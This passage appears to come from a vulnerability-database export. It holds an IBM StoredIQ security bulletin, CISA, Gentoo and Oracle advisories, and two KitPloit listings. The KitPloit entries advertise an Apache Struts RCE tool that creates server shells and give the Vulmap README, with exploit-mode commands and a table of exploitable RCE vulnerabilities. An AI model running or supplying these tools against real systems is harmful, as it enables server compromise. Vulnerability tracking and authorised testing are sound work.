(AV:N/AC:M/Au:N/C:P/I:P/A:P) \n\n \n**CVEID: **[CVE-2009-2625](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625>) \n**DESCRIPTION: **XMLScanner.java in Apache Xerces2 Java, asused in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/53082](<https://exchange.xforce.ibmcloud.com/vulnerabilities/53082>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2013-4002](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002>) \n**DESCRIPTION: **XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause adenial of service via vectors related to XML attribute names. \nCVSS Base score: 7.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85260](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85260>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:C) \n\n \n**CVEID: **[CVE-2012-0881](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0881>) \n**DESCRIPTION: **Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/134404](<https://exchange.xforce.ibmcloud.com/vulnerabilities/134404>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2015-6420](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6420>) \n**DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2017-15708](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15708>) \n**DESCRIPTION: **In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2019-12384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12384>) \n**DESCRIPTION: **FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162849](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162849>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2019-12814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12814>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162875](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162875>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nStoredIQ | 7.6.0 \n \n## Remediation/Fixes\n\n_Product_ | _VRMF_ | _APAR_ | _Remediation/First Fix_ \n---|---|---|--- \nIBM StoredIQ | 7.6.0.0 - 7.6.0.19 | _N/A_ | Apply Fix Pack 7.6.0.20 that is available from Fix Central. \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Feb 2020: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSSHEC\",\"label\":\"StoredIQ\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.6.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-20T12:42:12", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities identified in IBM StoredIQ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0217", "CVE-2009-2625", "CVE-2010-1632", "CVE-2012-0881", "CVE-2012-2098", "CVE-2012-5055", "CVE-2012-5783", "CVE-2013-0248", "CVE-2013-4002", "CVE-2013-7285", "CVE-2014-0050", "CVE-2014-0114", "CVE-2014-3578", "CVE-2014-3603", "CVE-2015-1796", "CVE-2015-6420", "CVE-2016-1000031", "CVE-2016-3093", "CVE-2016-3674", "CVE-2016-5725", "CVE-2017-15708", "CVE-2017-3523", "CVE-2017-3586", "CVE-2017-3589", "CVE-2017-5645", "CVE-2017-7957", "CVE-2018-10237", "CVE-2018-1272", "CVE-2018-20433", "CVE-2019-12384", "CVE-2019-12814", "CVE-2019-5427"], "modified": "2020-02-20T12:42:12", "id": "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "href": "https://www.ibm.com/support/pages/node/3106029", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:34", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:02:21", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-01-26T11:31:12", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2006-1547 | Apache Struts 1 ActionForm Denial of Service Vulnerability | 07/21/2022 \nCVE-2012-0391 | Apache Struts 2 Improper Input Validation Vulnerability | 07/21/2022 \nCVE-2018-8453 | Microsoft Windows Win32k Privilege Escalation Vulnerability | 07/21/2022 \nCVE-2021-35247 | SolarWinds Serv-U Improper Input Validation Vulnerability | 02/04/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/21/cisa-adds-four-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-01-21T00:00:00", "type": "cisa", "title": "CISA Adds Four Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1547", "CVE-2012-0391", "CVE-2018-8453", "CVE-2021-35247"], "modified": "2022-01-25T00:00:00", "id": "CISA:84B5063678E22C88DCF150A265C078F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/21/cisa-adds-four-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:07:53", "description": "### Background\n\nMySQL is a popular multi-threaded, multi-user SQL server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in MySQL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker could possibly gain escalated privileges. A remote attacker could send a specially crafted SQL query, possibly resulting in a Denial of Service condition. A remote attacker could entice a user to connect to specially crafted MySQL server, possibly resulting in execution of arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MySQL users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mysql-5.5.39\"", "cvss3": {}, "published": "2014-09-04T00:00:00", "type": "gentoo", "title": "MySQL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1861", "CVE-2013-2134", "CVE-2013-3839", "CVE-2013-5767", "CVE-2013-5770", "CVE-2013-5786", "CVE-2013-5793", "CVE-2013-5807", "CVE-2013-5860", "CVE-2013-5881", "CVE-2013-5882", "CVE-2013-5891", "CVE-2013-5894", "CVE-2013-5908", "CVE-2014-0001", "CVE-2014-0384", "CVE-2014-0386", "CVE-2014-0393", "CVE-2014-0401", "CVE-2014-0402", "CVE-2014-0412", "CVE-2014-0420", "CVE-2014-0427", "CVE-2014-0430", "CVE-2014-0431", "CVE-2014-0433", "CVE-2014-0437", "CVE-2014-2419", "CVE-2014-2430", "CVE-2014-2431", "CVE-2014-2432", "CVE-2014-2434", "CVE-2014-2435", "CVE-2014-2436", "CVE-2014-2438", "CVE-2014-2440"], "modified": "2014-09-04T00:00:00", "id": "GLSA-201409-04", "href": "https://security.gentoo.org/glsa/201409-04", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:55:22", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security 